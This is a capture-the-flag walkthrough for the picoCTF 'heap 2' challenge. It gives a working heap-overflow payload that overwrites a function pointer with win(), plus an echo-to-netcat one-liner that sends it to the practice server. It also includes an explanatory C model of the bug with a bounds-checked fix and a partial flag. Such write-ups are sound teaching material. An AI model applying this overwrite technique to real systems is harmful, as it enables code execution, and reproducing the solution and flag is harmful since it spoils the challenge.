Description
Can you handle function pointers?
Setup
Local + remote
Download chall and chall.c for local reversing.
Connect to mimas.picoctf.net <PORT_FROM_INSTANCE> to exploit the live service.
wget https://artifacts.picoctf.net/c_mimas/51/chall && \
chmod +x chall && \
wget https://artifacts.picoctf.net/c_mimas/51/chall.c
nc mimas.picoctf.net <PORT_FROM_INSTANCE>
Solution
This builds on heap 0 and heap 1 by introducing function pointer overwrites. Complete this challenge, then tackle heap 3 to learn use-after-free techniques.
- Step 1: Find win(). Use objdump -D chall | grep win to note the win() address (0x4011a0). Because the program runs on little-endian amd64, the payload must use the reversed byte order.
  objdump -D chall | less
- Step 2: Craft the payload. Overflow the 32-byte buffer with filler followed by the little-endian win() pointer (\xa0\x11\x40\x00\x00\x00\x00\x00).
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\x00\x00\x00\x00
- Step 3: Automate the menu interaction. Send option 2, deliver the payload, then call option 4 to execute the overwritten function pointer and print the flag.
  echo -e -n "2\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\x00\x00\x00\x00\n4\n" | nc mimas.picoctf.net <PORT_FROM_INSTANCE>
  A short pwntools script can accomplish the same thing if you prefer Python automation.
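To make the three steps concrete, here is an added C illustration of the bug class behind them; it is constructed for this writeup and is not chall.c or any other code from the challenge. It assumes a hypothetical heap object with a 32-byte buffer immediately followed by a function pointer (names struct object, vulnerable_fill, safe_fill, le64 and fn_after are all invented): le64() shows why 0x4011a0 becomes \xa0\x11\x40\x00... in memory, vulnerable_fill() is the unbounded copy that lets a 40-byte input reach the pointer, and safe_fill() is the bounds-checked fix that leaves it untouched. The overwritten pointer is only inspected, never called.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the layout the writeup describes: a 32-byte buffer
 * directly followed by a function pointer. Hypothetical, not chall.c. */
struct object {
    char buf[32];
    void (*fn)(void);
};

static void safe_fn(void) { puts("expected function ran"); }

/* Encode a 64-bit value in little-endian byte order, the in-memory order on
 * amd64. This is why 0x4011a0 must be written as a0 11 40 00 00 00 00 00. */
void le64(uint64_t value, unsigned char out[8]) {
    for (int i = 0; i < 8; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Vulnerable pattern: copies len bytes into buf with no bound on len, so a
 * 40-byte input overwrites the 8 bytes of fn that follow the buffer. */
void vulnerable_fill(struct object *obj, const unsigned char *src, size_t len) {
    for (size_t i = 0; i < len; i++)
        obj->buf[i] = (char)src[i];
}

/* Hardened form: caps the copy at sizeof(buf) - 1 and NUL-terminates, so
 * oversized input is truncated and fn is never reached. */
void safe_fill(struct object *obj, const unsigned char *src, size_t len) {
    size_t limit = sizeof obj->buf - 1;
    size_t n = len < limit ? len : limit;
    memcpy(obj->buf, src, n);
    obj->buf[n] = '\0';
}

/* Build the input shape from Step 2: filler bytes then a little-endian
 * pointer. Returns the total length written into out (out must be >= filler + 8). */
size_t build_input(unsigned char *out, size_t filler, uint64_t addr) {
    memset(out, 'A', filler);
    le64(addr, out + filler);
    return filler + 8;
}

/* Allocate an object on the heap, fill it with a 40-byte input through either
 * routine, and return the resulting value of fn without calling it. */
uintptr_t fn_after(int use_safe, uint64_t addr) {
    struct object *obj = malloc(sizeof *obj);
    unsigned char input[64];
    size_t len = build_input(input, sizeof obj->buf, addr);  /* 32 + 8 = 40 bytes */
    obj->fn = safe_fn;
    if (use_safe)
        safe_fill(obj, input, len);
    else
        vulnerable_fill(obj, input, len);
    uintptr_t result = (uintptr_t)obj->fn;
    free(obj);
    return result;
}

int main(void) {
    unsigned char bytes[8];
    le64(0x4011a0, bytes);
    printf("little-endian 0x4011a0:");
    for (int i = 0; i < 8; i++) printf(" %02x", bytes[i]);
    printf("\nfn after vulnerable_fill: 0x%lx\n", (unsigned long)fn_after(0, 0x4011a0));
    printf("fn after safe_fill:       0x%lx (unchanged)\n", (unsigned long)fn_after(1, 0x4011a0));
    return 0;
}
```

The sizes in the model match the writeup (32 bytes of filler, then 8 bytes of pointer), which is exactly why a single length check on the copy closes the bug: once the copy cannot exceed the buffer, the function pointer stays whatever the program assigned.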
Flag
picoCTF{and_down_the_road_we_go_dbb...}
Overwriting the function pointer with win() immediately prints the flag.